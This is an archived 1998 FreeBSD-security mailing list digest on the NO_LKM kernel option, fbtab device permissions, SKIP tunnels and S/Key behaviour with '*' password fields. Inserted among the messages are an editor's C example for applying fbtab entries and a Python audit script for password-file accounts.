From: Steve Reid To: ark@eltex.spb.ru cc: freebsd-security@FreeBSD.ORG, regnauld@deepo.prosa.dk Subject: options NO_LKM (was Re: Virus on FreeBSD) In-Reply-To: <199805221402.OAA16417@paranoid.eltex.spb.ru> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk On Fri, 22 May 1998 ark@eltex.spb.ru wrote: > 2.1.7.1 does not have NO_LKM option in LINT. Don't know if it does > something for that system. I grepped my entire 2.2.5-RELEASE kernel source for the string 'NO_LKM' and couldn't find it. When was this option added to the kernel? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Fri May 22 13:42:19 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id NAA12748 for freebsd-security-outgoing; Fri, 22 May 1998 13:42:19 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from burka.rdy.com (dima@burka.rdy.com [205.149.163.30]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id NAA12601 for ; Fri, 22 May 1998 13:42:01 -0700 (PDT) (envelope-from dima@burka.rdy.com) Received: (from dima@localhost) by burka.rdy.com (8.8.8/RDY&DVV) id NAA08934; Fri, 22 May 1998 13:41:37 -0700 (PDT) Message-Id: <199805222041.NAA08934@burka.rdy.com> Subject: Re: options NO_LKM (was Re: Virus on FreeBSD) In-Reply-To: from Steve Reid at "May 22, 98 12:51:43 pm" To: sreid@alpha.sea-to-sky.net (Steve Reid) Date: Fri, 22 May 1998 13:41:37 -0700 (PDT) Cc: ark@eltex.spb.ru, freebsd-security@FreeBSD.ORG, regnauld@deepo.prosa.dk X-Class: Fast Organization: HackerDome Reply-To: dima@best.net 
From: dima@best.net (Dima Ruban) X-Mailer: ELM [version 2.4ME+ PL40 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk Steve Reid writes: > On Fri, 22 May 1998 ark@eltex.spb.ru wrote: > > 2.1.7.1 does not have NO_LKM option in LINT. Don't know if it does > > something for that system. > > I grepped my entire 2.2.5-RELEASE kernel source for the string 'NO_LKM' > and couldn't find it. When was this option added to the kernel? dima 1998/02/11 12:48:05 PST Modified files: sys/i386/conf LINT sys/kern kern_lkm.c Log: I'm not sure whether this is a correct way to do it, but here's a new kernel option - "NO_LKM" If anyone has better ideas - please let me know. Revision Changes Path 1.406 +5 -1 src/sys/i386/conf/LINT 1.47 +3 -3 src/sys/kern/kern_lkm.c -- dima To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Fri May 22 16:29:31 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id QAA13875 for freebsd-security-outgoing; Fri, 22 May 1998 16:29:31 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from annwn.phys.washington.edu (annwn.phys.washington.edu [128.95.93.180]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id QAA13738 for ; Fri, 22 May 1998 16:28:39 -0700 (PDT) (envelope-from somsky@annwn.phys.washington.edu) Received: (from somsky@localhost) by annwn.phys.washington.edu (8.8.8/8.8.8) id QAA00295 for freebsd-security@FreeBSD.ORG; Fri, 22 May 1998 16:28:25 -0700 (PDT) (envelope-from somsky) Date: Fri, 22 May 1998 16:28:25 -0700 (PDT) 
From: "William R. Somsky" Message-Id: <199805222328.QAA00295@annwn.phys.washington.edu> To: freebsd-security@FreeBSD.ORG Subject: How to let users access removable media? Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk I've just recently set up a couple of FreeBSD systems here at the UW Physics department, and I need to be able to set them up so that the users can access the floppy and (ATAPI) zip drives. For mtools access, I suppose I can just make /dev/[r]fd0 and /dev/[r]wfd0* be world readable and writable, but is this the best way to go about it? Should something else be used? And I doubt that it's imminent, but what about when someone wants to mount a cd-rom? I'd like to be able to handle this in a relatively secure fashion w/out compromising the systems. Anyone been through this before or have any suggestions? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Fri May 22 18:49:27 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id SAA10481 for freebsd-security-outgoing; Fri, 22 May 1998 18:49:27 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from netmug.org (perl@netmug.org [207.88.43.66]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id SAA10471 for ; Fri, 22 May 1998 18:49:18 -0700 (PDT) (envelope-from perl@netmug.org) Received: from localhost (perl@localhost) by netmug.org (8.8.8/NetMUG_1.0.0) with SMTP id SAA25881; Fri, 22 May 1998 18:47:17 -0700 (PDT) Date: Fri, 22 May 1998 18:47:17 -0700 (PDT) 
From: perl To: "William R. Somsky" cc: freebsd-security@FreeBSD.ORG Subject: Re: How to let users access removable media? In-Reply-To: <199805222328.QAA00295@annwn.phys.washington.edu> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk fbtab - change device protection upon login Check out the fbtab(5) man page for more info. Michael On Fri, 22 May 1998, William R. Somsky wrote: > I've just recently set up a couple of FreeBSD systems here at > the UW Physics department, and I need to be able to set them > up so that the users can access the floppy and (ATAPI) zip > drives. For mtools access, I suppose I can just make /dev/[r]fd0 > and /dev/[r]wfd0* be world readable and writable, but is this the > best way to go about it? Should something else be used? And I doubt > that it's immenent, but what about when someone wants to mount a cd-rom? > I'd like to be able to handle this in a relatively secure fashion w/out > compromising the systems. Anyone been through this before or/have any > suggestions? 
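To show what fbtab buys over world-writable device nodes, here is an added example by the editor (not code from this thread and not FreeBSD's login(1)) that resolves, for one login tty, the actions login would take from a table in fbtab format: skip comments, parse the login tty, an octal mode and a colon-separated device list, and hand the listed nodes to the user at that mode. The three-field layout follows fbtab(5) as the editor reads it; exact tty matching, the FBTAB_MAX limit, the constructed sample table and the world-access check are assumptions of the example, so confirm the details against the man page on your release.

```c
/*
 * Editor's example: a dry run of the /etc/fbtab mechanism.  On login the
 * devices listed for the user's tty are chowned to the user and chmoded
 * to the stated mode, so /dev/fd0 and friends never need to be world
 * writable.  The parser takes the table as a string so it runs offline;
 * fbtab_apply() is the part that touches the device nodes for real.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

#define FBTAB_MAX 8   /* assumption: enough entries for one tty */

struct fbtab_action {
    char dev[64];
    unsigned mode;
};

struct fbtab_result {
    int n;                               /* actions found; -1 = malformed table */
    struct fbtab_action act[FBTAB_MAX];
};

/* Would this mode still leave the device open to everyone? */
int fbtab_world_accessible(unsigned mode)
{
    return (mode & 007) != 0;
}

/* Resolve the actions for tty from fbtab text; a malformed line refuses the whole table. */
struct fbtab_result fbtab_resolve(const char *text, const char *tty)
{
    struct fbtab_result res;
    const char *p = text;

    res.n = 0;
    while (*p != '\0') {
        char line[512], ltty[64], lmode[16], ldevs[384], *end, *dev;
        const char *nl = strchr(p, '\n'), *s;
        size_t full = nl ? (size_t)(nl - p) : strlen(p);
        size_t len = full < sizeof line ? full : sizeof line - 1;
        unsigned long mode;

        memcpy(line, p, len);
        line[len] = '\0';
        p += nl ? full + 1 : full;

        s = line + strspn(line, " \t");
        if (*s == '\0' || *s == '#')      /* blank line or comment */
            continue;
        if (sscanf(s, "%63s %15s %383s", ltty, lmode, ldevs) != 3) {
            res.n = -1;
            return res;
        }
        mode = strtoul(lmode, &end, 8);
        if (*end != '\0' || mode > 07777) {   /* insist on a clean octal mode */
            res.n = -1;
            return res;
        }
        if (strcmp(ltty, tty) != 0)
            continue;
        for (dev = ldevs; dev != NULL && *dev != '\0' && res.n < FBTAB_MAX; ) {
            char *colon = strchr(dev, ':');

            if (colon != NULL)
                *colon = '\0';
            snprintf(res.act[res.n].dev, sizeof res.act[res.n].dev, "%s", dev);
            res.act[res.n].mode = (unsigned)mode;
            res.n++;
            dev = colon ? colon + 1 : NULL;
        }
    }
    return res;
}

/* What login(1) would do for real: hand each device to uid:gid at its mode.
 * Returns how many devices were changed. */
int fbtab_apply(const struct fbtab_result *r, uid_t uid, gid_t gid)
{
    int i, done = 0;

    for (i = 0; i < r->n; i++)
        if (chown(r->act[i].dev, uid, gid) == 0 &&
            chmod(r->act[i].dev, (mode_t)r->act[i].mode) == 0)
            done++;
    return done;
}

/* Small helpers so the outcome can be checked without poking at the struct. */
int fbtab_count(const char *text, const char *tty)
{
    return fbtab_resolve(text, tty).n;
}

int fbtab_entry_is(const char *text, const char *tty, int idx,
                   const char *dev, unsigned mode)
{
    struct fbtab_result r = fbtab_resolve(text, tty);

    return idx >= 0 && idx < r.n && strcmp(r.act[idx].dev, dev) == 0 &&
           r.act[idx].mode == mode;
}

/* Constructed sample table in the spirit of the floppy/zip question. */
static const char sample_fbtab[] =
    "# login tty      mode   devices handed to the user on login\n"
    "/dev/ttyv0       0600   /dev/fd0:/dev/rfd0:/dev/wfd0:/dev/rwfd0\n"
    "/dev/ttyv1       0600   /dev/fd0:/dev/rfd0\n"
    "/dev/ttyv1       0666   /dev/cd0c\n";   /* world access: worth flagging */
```

Running fbtab_world_accessible() over every resolved entry before calling fbtab_apply() catches a table that quietly reintroduces the world-writable node the mechanism was meant to avoid.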
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Sat May 23 00:07:48 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id AAA11194 for freebsd-security-outgoing; Sat, 23 May 1998 00:07:48 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from mail.webspan.net (root@mail.webspan.net [206.154.70.7]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id AAA11188 for ; Sat, 23 May 1998 00:07:42 -0700 (PDT) (envelope-from opsys@mail.webspan.net) Received: from orion.webspan.net (orion.webspan.net [206.154.70.5]) by mail.webspan.net (WEBSPAN/970608) with SMTP id DAA08141 for ; Sat, 23 May 1998 03:02:56 -0400 (EDT) Date: Sat, 23 May 1998 03:07:41 -0400 (EDT) 
From: Open Systems Networking X-Sender: opsys@orion.webspan.net To: freebsd-security@FreeBSD.ORG Subject: SKIP problems Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk Does anyone in this universe have a working SKIP tunnel on FreeBSD machines? I just spent the last 48 hours with someone trying every human, chicken, cow voodoo sacrifice possible to get skip going and it completely fails. We got so far that in the LOGS it looks like it works: May 23 01:54:59 pinkfloyd skipd: Calculating Shared secret for bc4d5980738b6378f26be386261cd9d8 May 23 01:55:00 pinkfloyd skipd: Done When I telnet to him the first time it spews that. To me that looks like everything is configured. Before it was spewing CERT=NULL or something along those lines. We cannot get this thing working. It says the shared secret has been calculated and when I telnet or ping, then it just hangs and times out. Anyone have a working tunnel? Anyone have notes on how to get it working? Frustrated in SKIP-Land -- "I don't do favors, I accumulate debts" ===================================| Open Systems Networking And Consulting. FreeBSD 2.2.6 is available now! | Phone: 316-326-6800 -----------------------------------| 1402 N. Washington, Wellington, KS-67152 FreeBSD: The power to serve! 
| E-Mail: opsys@open-systems.net http://www.freebsd.org | Consulting-Network Engineering-Security ===================================| http://open-systems.net -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.2 mQENAzPemUsAAAEH/06iF0BU8pMtdLJrxp/lLk3vg9QJCHajsd25gYtR8X1Px1Te gWU0C4EwMh4seDIgK9bzFmjjlZOEgS9zEgia28xDgeluQjuuMyUFJ58MzRlC2ONC foYIZsFyIqdjEOCBdfhH5bmgB5/+L5bjDK6lNdqD8OAhtC4Xnc1UxAKq3oUgVD/Z d5UJXU2xm+f08WwGZIUcbGcaonRC/6Z/5o8YpLVBpcFeLtKW5WwGhEMxl9WDZ3Kb NZH6bx15WiB2Q/gZQib3ZXhe1xEgRP+p6BnvF364I/To9kMduHpJKU97PH3dU7Mv CXk2NG3rtOgLTEwLyvtBPqLnbx35E0JnZc0k5YkABRO0JU9wZW4gU3lzdGVtcyA8 b3BzeXNAb3Blbi1zeXN0ZW1zLm5ldD4= =BBjp -----END PGP PUBLIC KEY BLOCK----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Sat May 23 06:48:12 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id GAA27476 for freebsd-security-outgoing; Sat, 23 May 1998 06:48:12 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from passer.osg.gov.bc.ca (0@passer.osg.gov.bc.ca [142.32.110.29]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id GAA27467 for ; Sat, 23 May 1998 06:48:07 -0700 (PDT) (envelope-from cy@cschuber.net.gov.bc.ca) Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.8.8/8.6.10) id GAA18535; Sat, 23 May 1998 06:47:53 -0700 (PDT) Received: from cschuber.net.gov.bc.ca(142.31.240.113), claiming to be "cwsys.cwsent.com" via SMTP by passer.osg.gov.bc.ca, id smtpdaasnoa; Sat May 23 06:47:51 1998 Received: (from uucp@localhost) by cwsys.cwsent.com (8.9.0/8.6.10) id GAA12539; Sat, 23 May 1998 06:35:04 -0700 (PDT) Message-Id: <199805231335.GAA12539@cwsys.cwsent.com> Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwsent.com, id smtpdd12528; Sat May 23 06:35:01 1998 X-Mailer: exmh version 2.0.2 2/24/98 Reply-to: Cy Schubert - ITSD Open Systems Group 
From: Cy Schubert - ITSD Open Systems Group X-Sender: cy To: Garrett Wollman cc: Philippe Regnauld , freebsd-security@FreeBSD.ORG Subject: Re: SKey and locked account In-reply-to: Your message of "Thu, 21 May 1998 20:05:20 EDT." <199805220005.UAA00936@khavrinen.lcs.mit.edu> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Sat, 23 May 1998 06:34:56 -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk > < said: > > > 1) First thing I noticed is that it's possible for someone to log > > into the system, even if the account is disabled ('*' in the > > passwd field), when S/Key is enabled for that user. > > Having an invalid password in the password file doesn't mean that the > account is disabled; it just means that that user can't use a > plain-text password to log in. Several of us have invalid passwords > on freefall since we always use an alternative authentication > mechanism like S/Key. A trick I use is to set NIS+ (or NIS) passwords to "*" which forces users to use Kerberos authentication while using NIS+ (or NIS) for UID to username mapping. 
Regards, Phone: (250)387-8437 Cy Schubert Fax: (250)387-5766 Open Systems Group Internet: cschuber@uumail.gov.bc.ca ITSD Cy.Schubert@gems8.gov.bc.ca Government of BC To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Sat May 23 11:04:43 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id LAA09059 for freebsd-security-outgoing; Sat, 23 May 1998 11:04:43 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from cyan.healthnet-sl.es (CYAN.HEALTHNET-SL.ES [194.179.35.142]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id LAA08579 for ; Sat, 23 May 1998 11:03:58 -0700 (PDT) (envelope-from webmaster@healthnet-sl.es) Received: from healthnet-sl.es ([194.224.43.126]) by cyan.healthnet-sl.es (8.8.5/8.8.5) with ESMTP id UAA04379; Sat, 23 May 1998 20:01:56 +0200 (CEST) Message-ID: <35670F6B.87F2BBDC@healthnet-sl.es> Date: Sat, 23 May 1998 20:03:23 +0200 
From: Carlos
X-Mailer: Mozilla 4.03 [es] (WinNT; I)
MIME-Version: 1.0
To: Robert Watson
CC: Pavol Adamec , "freebsd-security@FreeBSD.ORG"
Subject: Re: Virus on FreeBSD
References:
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk

Robert Watson wrote:
>
> [...]
>
> To protect the kernel properly, lkms need to be disabled at a sufficiently
> high run-level (possibly always), and appropriate file system stuff
> protected.  Personally, I like the idea of using a CD-ROM for a file
> system, but it's not so very fast.

A related topic: the FreeBSD handbook mentions a booting setup with
read-only media involved:

--- from handbook ---------------------------------------------------
24.1.4. Interesting combinations

Boot a kernel with a MFS in it with a special /sbin/init which...

[...]

E -- Acts as a firewall/web-server/what do I know...

This is particularly interesting since you can boot from a
write-protected floppy, but still write to your root filesystem...
--- end ------------------------------------------------------------

How far could one go with a custom CD-ROM used for booting?  Does anyone
have such a setup working?
Carlos Amengual
Healthnet SL

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message

From owner-freebsd-security  Sat May 23 11:22:04 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id LAA17890 for freebsd-security-outgoing; Sat, 23 May 1998 11:22:04 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from antipodes.cdrom.com (castles231.castles.com [208.214.165.231]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id LAA17264 for ; Sat, 23 May 1998 11:20:56 -0700 (PDT) (envelope-from mike@antipodes.cdrom.com)
Received: from antipodes.cdrom.com (localhost [127.0.0.1]) by antipodes.cdrom.com (8.8.8/8.8.5) with ESMTP id KAA01275; Sat, 23 May 1998 10:10:31 -0700 (PDT)
Message-Id: <199805231710.KAA01275@antipodes.cdrom.com>
X-Mailer: exmh version 2.0zeta 7/24/97
To: Philippe Regnauld
cc: Mike Smith , freebsd-security@FreeBSD.ORG
Subject: Re: SKey and locked account
In-reply-to: Your message of "Fri, 22 May 1998 10:12:15 +0200." <19980522101215.41390@deepo.prosa.dk>
Mime-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Date: Sat, 23 May 1998 10:10:31 -0700
From: Mike Smith
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by hub.freebsd.org id LAA17282
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk

> Mike Smith writes:
>
> > > I'm currently experimenting with 2.2.6, FWTK and skey.
> > >
> > > 1) First thing I noticed is that it's possible for someone to log
> > > into the system, even if the account is disabled ('*' in the
> > > passwd field), when S/Key is enabled for that user.
> > >
> > > Surprise to me.
> >
> > "*" does not disable an account - it is an invalid crypted string which
> > will fail to match any crypted plaintext password, as used by login,
> > the r* commands and ftp (when FTP is not using s/key).
>
> Ok -- just referring to the man page:
>
>      The password field is the encrypted form of the password.  If the
>      password field is empty, no password will be required to gain access to
>      the machine.  This is almost invariably a mistake.  Because these files
>      contain the encrypted user passwords, they should not be readable by
>      anyone without appropriate privileges.  Administrative accounts have a
>      password field containing an asterisk `*' which disallows normal logins.
>
> ... it doesn't mention the fact that they _also_ have an invalid
> shell.

No, they don't.  Administrative accounts disallow normal logins.
Having an invalid shell would prevent non-normal logins.

It would (perhaps) be worthwhile adding some verbiage to the
description of the shell field to make it clearer that setting it to
refer to /sbin/nologin is the preferred technique for preventing a user
having any access to the system.  The current text assumes that the
reader already possesses this knowledge.

Care to phrase something up and post a PR with it?

-- 
\\  Sometimes you're ahead,       \\  Mike Smith
\\  sometimes you're behind.      \\  mike@smith.net.au
\\  The race is long, and in the  \\  msmith@freebsd.org
\\  end it's only with yourself.  \\  msmith@cdrom.com

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message

From owner-freebsd-security  Sat May 23 18:32:02 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id SAA06039 for freebsd-security-outgoing; Sat, 23 May 1998 18:32:02 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from www.communique.no (www.communique.no [193.212.204.33]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id SAA06000 for ; Sat, 23 May 1998 18:31:54 -0700 (PDT) (envelope-from are@communique.no)
Received: (qmail 2987 invoked by uid 1001); 23 May 1998 23:50:39 -0000
Date: Sun, 24 May 1998 01:50:39 +0200 (CEST)
From: Are Bryne
X-Sender: are@rune.communique.no
To: Mike Smith
cc: freebsd-security@FreeBSD.ORG
Subject: Re: SKey and locked account
In-Reply-To: <199805231710.KAA01275@antipodes.cdrom.com>
Message-ID:
Organization: Communique DA
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk

On Sat, 23 May 1998, Mike Smith wrote:

> No, they don't.  Administrative accounts disallow normal logins.
> Having an invalid shell would prevent non-normal logins.

I am not sure I understand you here...

> Having an invalid shell would prevent non-normal logins.
>
> It would (perhaps) be worthwhile adding some verbiage to the
> description of the shell field to make it clearer that setting it to
> refer to /sbin/nologin is the preferred technique for preventing a user
> having any access to the system.  The current text assumes that the
> reader already possesses this knowledge.

Then perhaps the default /nonexistent 'shell' for various password file
entries should be changed also?

Regards,
Are Bryne

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message

From owner-freebsd-security  Sat May 23 21:17:51 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id VAA03421 for freebsd-security-outgoing; Sat, 23 May 1998 21:17:51 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from granite.sentex.net (granite.sentex.ca [199.212.134.1]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id VAA03392 for ; Sat, 23 May 1998 21:17:44 -0700 (PDT) (envelope-from mike@sentex.net)
Received: from ospf-mdt.sentex.net (ospf-mdt.sentex.net [205.211.164.81]) by granite.sentex.net (8.8.6/8.6.9) with SMTP id AAA01784; Sun, 24 May 1998 00:17:07 -0400 (EDT)
From: mike@sentex.net (Mike Tancsa)
To: opsys@mail.webspan.net
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: SKIP problems
Date: Sun, 24 May 1998 04:19:28 GMT
Message-ID: <35679e72.95133855@mail.sentex.net>
References:
In-Reply-To:
X-Mailer: Forte Agent .99e/32.227
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk

On Sat, 23 May 1998 03:07:41 -0400 (EDT), in sentex.lists.freebsd.misc you
wrote:

>everything is configured. before it was spewing CERT=NULL or something

I ran into the same sort of problems when I first started playing with it.
Turned out the key database was all munged up.  I got around the problem by
blowing away the CERTS and reinstalling them.  The documentation is somewhat
sparse, but accurate if I recall correctly.  I got the machines working
properly by following the instructions exactly and paying particular
attention to the order of it all.  Also, have a look at the SKIP mailing
list archive.  There were some helpful hints in there as well.

        ---Mike

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message

From owner-freebsd-security  Sat May 23 21:25:46 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id VAA04854 for freebsd-security-outgoing; Sat, 23 May 1998 21:25:46 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from antipodes.cdrom.com (castles167.castles.com [208.214.165.167]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id VAA04649 for ; Sat, 23 May 1998 21:24:35 -0700 (PDT) (envelope-from mike@antipodes.cdrom.com)
Received: from antipodes.cdrom.com (localhost [127.0.0.1]) by antipodes.cdrom.com (8.8.8/8.8.5) with ESMTP id PAA02689; Sat, 23 May 1998 15:47:51 -0700 (PDT)
Message-Id: <199805232247.PAA02689@antipodes.cdrom.com>
X-Mailer: exmh version 2.0zeta 7/24/97
To: Are Bryne
cc: Mike Smith , freebsd-security@FreeBSD.ORG
Subject: Re: SKey and locked account
In-reply-to: Your message of "Sun, 24 May 1998 01:50:39 +0200."
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Sat, 23 May 1998 15:47:50 -0700
From: Mike Smith
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk

> On Sat, 23 May 1998, Mike Smith wrote:
>
> > No, they don't.  Administrative accounts disallow normal logins.
> > Having an invalid shell would prevent non-normal logins.
>
> I am not sure I understand you here...

An administrative account, e.g. 'news', may still require a valid shell,
even though you may not wish to allow someone to login as 'news'.

> > Having an invalid shell would prevent non-normal logins.
> >
> > It would (perhaps) be worthwhile adding some verbiage to the
> > description of the shell field to make it clearer that setting it to
> > refer to /sbin/nologin is the preferred technique for preventing a user
> > having any access to the system.  The current text assumes that the
> > reader already possesses this knowledge.
>
> Then perhaps the default /nonexistent 'shell' for various password file
> entries should be changed also?

It would probably make sense to have /sbin/nologin the default shell for
those accounts, yes.  Want to file a PR?

-- 
\\  Sometimes you're ahead,       \\  Mike Smith
\\  sometimes you're behind.      \\  mike@smith.net.au
\\  The race is long, and in the  \\  msmith@freebsd.org
\\  end it's only with yourself.  \\  msmith@cdrom.com

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message
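The point the S/Key thread keeps returning to (a "*" password field only defeats plain-text password login, while the shell field is what decides whether any session can start at all, which is also why Cy Schubert's "*"-plus-Kerberos trick works) can be turned into an audit of a password file. The following is an added example, not code from the thread or from FreeBSD; it parses constructed master.passwd-style lines and flags the accounts that rely on "*" alone while still carrying a usable shell.

```python
import re

# Shells that cannot start a session: /sbin/nologin (the thread's recommendation)
# and /nonexistent (the default the thread questions; exec() of it simply fails).
NO_SESSION_SHELLS = {"/sbin/nologin", "/nonexistent"}

# A DES crypt(3) result is 13 chars from [./0-9A-Za-z]; modular hashes start with
# '$'. Anything else, such as "*", can never equal a crypted password.
_CRYPT_RE = re.compile(r"^(\$.+|[./0-9A-Za-z]{13})$")

def parse_master_passwd(text):
    """Yield (name, password, shell) from master.passwd(5) lines
    (name:pw:uid:gid:class:change:expire:gecos:home:shell)."""
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        f = line.split(":")
        if len(f) != 10:
            raise ValueError("malformed entry: %r" % line)
        # login(1) falls back to /bin/sh when the shell field is empty.
        yield f[0], f[1], f[9] or "/bin/sh"

def classify(password, shell):
    """Reachability of one account. The shell is checked first because it gates
    every login path; the password field only governs plain-text password login."""
    if shell in NO_SESSION_SHELLS:
        return "no-session"      # nothing starts, whatever the password field holds
    if password == "":
        return "no-password"     # the "almost invariably a mistake" case in passwd(5)
    if not _CRYPT_RE.match(password):
        return "alt-auth-only"   # "*": plain-text login fails, S/Key/Kerberos still work
    return "password"

def audit(text):
    """Map account name -> class; 'alt-auth-only' is what the thread calls not really disabled."""
    return {name: classify(pw, sh) for name, pw, sh in parse_master_passwd(text)}

# Constructed sample file, not taken from any real system.
SAMPLE = """\
root:$1$sample$notarealhashxxxxxxxxxx:0:0::0:0:Charlie &:/root:/bin/csh
alice:*:1001:1001::0:0:Alice, S/Key user:/home/alice:/bin/sh
bob::1002:1002::0:0:Bob:/home/bob:/bin/sh
news:*:8:8::0:0:News Subsystem:/:/nonexistent
operator:*:2:5::0:0:System &:/:/sbin/nologin
"""

if __name__ == "__main__":
    for name, cls in audit(SAMPLE).items():
        print("%-10s %s" % (name, cls))
```

Only "alice" comes out as alt-auth-only: her "*" blocks password login but, with /bin/sh as shell, S/Key or any other configured authenticator still yields a session.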